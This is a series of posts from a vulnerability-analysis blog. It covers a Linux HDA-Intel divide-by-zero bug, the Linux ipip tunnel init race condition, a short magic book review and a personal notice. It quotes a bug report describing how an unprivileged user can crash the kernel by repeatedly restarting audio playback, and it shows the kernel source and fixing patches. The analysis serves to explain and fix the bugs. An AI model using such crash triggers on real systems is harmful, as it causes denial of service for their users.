Let’s have a quick look at it. The first ‘if’ condition will check the existence of the “stream full start flag” as well as if the start jiffies is before the current jiffies which will result in immediate return with -1. Otherwise, it will update the “stream full start flag” and invoke azx_get_position() to retrieve the position buffer in the given device. If its position fix mode is set to ‘POS_FIX_AUTO’, it will issue a warning message using printk(), change it to ‘POS_FIX_LPIB’ and at last, call azx_get_position() to obtain the correct position buffer. In any other case, it will set its position fix flag to ‘POS_FIX_POSBUF’. After exiting this loop we have the more interesting segment. After checking that ‘bdl_pos_adj[]‘ contains a value for the provided index it will attempt to calculate the period boundary and return either 0 or 1. However, as Jody Bruchon noticed, in some cases ‘azx_dev->period_bytes’ which represents the size of the period in bytes could be set to zero. As we can read in his bug report…

Using mp3blaster-3.2.5 (latest version) to play MP3 audio, I am able to
crash the kernel by stopping and restarting playback using the "5" key
repeatedly.  This happens as a normal user, not only as root.  Kernel
backtrace points to azx_position_ok() dividing by zero, so wrote a tiny
patch to investigate which reported via printk() values of pos and
azx_dev->period_bytes; on crash, both were 0.  The offending operation
does: if (pos % azx_dev->period_bytes > azx_dev->period_bytes / 2)
which obviously is the source of the crash.

Obviously, the division will result in a divide by zero situation if this is the case. To reproduce the bug, J. Bruchon did the following:

A small shell script or example program which triggers the problem (if possible)
mp3blaster-3.2.5 with repeated start/stop of playback consistently causes
this crash, without fail.  Just keep hitting "5" every three seconds.

And the patch was clearly…

        if (!bdl_pos_adj[chip->dev_index])
                return 1; /* no delayed ack */
+       if (azx_dev->period_bytes == 0) {
+               printk(KERN_WARNING
+                      "hda-intel: Divide by zero was avoided "
+                      "in azx_dev->period_bytes.\n");
+               return 0;
+       }
        if (pos % azx_dev->period_bytes > azx_dev->period_bytes / 2)

Which is a simple check against zero before moving on to the calculation process.

Book: Mind Magic

•February 22, 2010 • 2 Comments



Title: Mind Magic: Extraordinary Tricks to Mystify, Baffle and Entertain
Author: Marc Lemezma

This is a neat little book (less than 100 pages) which discusses some mind tricks used by magicians and/or mentalists for entertainment. I found it pretty nice and fun. The tricks described range from common tricks such as predicting a card from a deck of cards that someone selected to more impressive ones such as mind tricks for groups of people.
To conclude, if you have some spare time and you want to have fun with some friends it’s a nice book but don’t expect anything extremely advanced in it. :)

Linux kernel Tunnels Race Condition

•February 21, 2010 • 3 Comments

I read about this bug from Eugene Teo’s email to oss-security mailing list. The issue was discovered by Alexey Dobriyan and here is the buggy code from net/ipv4/ipip.c as seen in 2.6.32 release of the Linux kernel.

static int __init ipip_init(void)
{
        int err;

        printk(banner);

        if (xfrm4_tunnel_register(&ipip_handler, AF_INET)) {
                printk(KERN_INFO "ipip init: can't register tunnel\n");
                return -EAGAIN;
        }

        err = register_pernet_gen_device(&ipip_net_id, &ipip_net_ops);
        if (err)
                xfrm4_tunnel_deregister(&ipip_handler, AF_INET);

        return err;
}
       ...
module_init(ipip_init);

As you can read in the above module initialization routine, after printing the module’s banner using printk() function, the code will invoke xfrm4_tunnel_register() which is a function located at net/ipv4/tunnel4.c and it is used to register a new XFRM tunnel handler. In this case, that is the ipip_handler() routine for the ‘AF_INET’ family. The next call to register_pernet_gen_device() is used to initialize the initilization and cleanup callback functions for the ‘ipip_net_id’ network ID. If this fails it will unregister the previously registered tunnel handler.
As Alexey Dobriyan noticed, the receive hook of the new handler could be called right after the registration of the handler and before the registration of the network operations through register_pernet_gen_device(). If this is the case, then ipip_rcv() will be invoked since this is the registered handler as we can read below:

static struct xfrm_tunnel ipip_handler = {
        .handler        =       ipip_rcv,
        .err_handler    =       ipip_err,
        .priority       =       1,
};

Now, if we move to this routine we’ll read the following…

static int ipip_rcv(struct sk_buff *skb)
{
        struct ip_tunnel *tunnel;
        const struct iphdr *iph = ip_hdr(skb);

        read_lock(&ipip_lock);
        if ((tunnel = ipip_tunnel_lookup(dev_net(skb->dev),
                                        iph->saddr, iph->daddr)) != NULL) {
     ...
        return -1;
}

So, after performing the required locking it will immediately call ipip_tunnel_lookup() which starts by calling the code shown here:

static struct ip_tunnel * ipip_tunnel_lookup(struct net *net,
                __be32 remote, __be32 local)
{
        unsigned h0 = HASH(remote);
        unsigned h1 = HASH(local);
        struct ip_tunnel *t;
        struct ipip_net *ipn = net_generic(net, ipip_net_id);
     ...
        return NULL;
}

As you can read, it will invoke net_generic() of include/net/netns/generic.h passing the possibly unititialized ‘ipip_net_id’. This will lead to the following call to BUG_ON() macro…

struct net_generic {
        unsigned int len;
        struct rcu_head rcu;

        void *ptr[0];
};

static inline void *net_generic(struct net *net, int id)
{
        struct net_generic *ng;
        void *ptr;

        rcu_read_lock();
        ng = rcu_dereference(net->gen);
        BUG_ON(id == 0 || id > ng->len);
        ptr = ng->ptr[id - 1];
        rcu_read_unlock();

        return ptr;
}

Since the network operations may have not been initialized yet, the ‘id’ integer could result in triggering the above BUG_ON() macro and thus OOPSing the kernel. To fix this the following patch was applied:

 	printk(banner);

-	if (xfrm4_tunnel_register(&ipip_handler, AF_INET)) {
+	err = register_pernet_device(&ipip_net_ops);
+	if (err < 0)
+		return err;
+	err = xfrm4_tunnel_register(&ipip_handler, AF_INET);
+	if (err < 0) {
+		unregister_pernet_device(&ipip_net_ops);
 		printk(KERN_INFO "ipip init: can't register tunnel\n");
-		return -EAGAIN;
 	}
-
-	err = register_pernet_device(&ipip_net_ops);
-	if (err)
-		xfrm4_tunnel_deregister(&ipip_handler, AF_INET);
-
 	return err;

Basically, this code justs re-orders the initialization code in order to move the network operations registration first, before the handler callbacks registration. The exact same bug was present in IPv6 tunnels, SIT tunnels, XFRM6 tunnels and GRE protocol.

xorl and the army…

•January 22, 2010 • 18 Comments

Hello good fellows!

This post is just to inform you that it’s time for me to fulfil my military service.

Since some of you might not be aware, in Greece military service is mandatory for every male citizen. Even wikipedia has an entry for this!!1 (lol)

Because of this, I won’t be able to make new posts, moderate comments and answer emails for this sort period of time serving as a soldier.

Even though I have a few more days (about 10) as a free Greek citizen, I’ve decided that I won’t spend them on blogging :P

Of course, I’ll be updating my twitter when possible but I don’t think I’ll be able to write any new vulnerability analysis blog posts while being at the army.

Anyway, I won’t waste more of your time with my crap. Just have fun with anything you do, and as always… Happy coding!!!!

See you soon.

.313.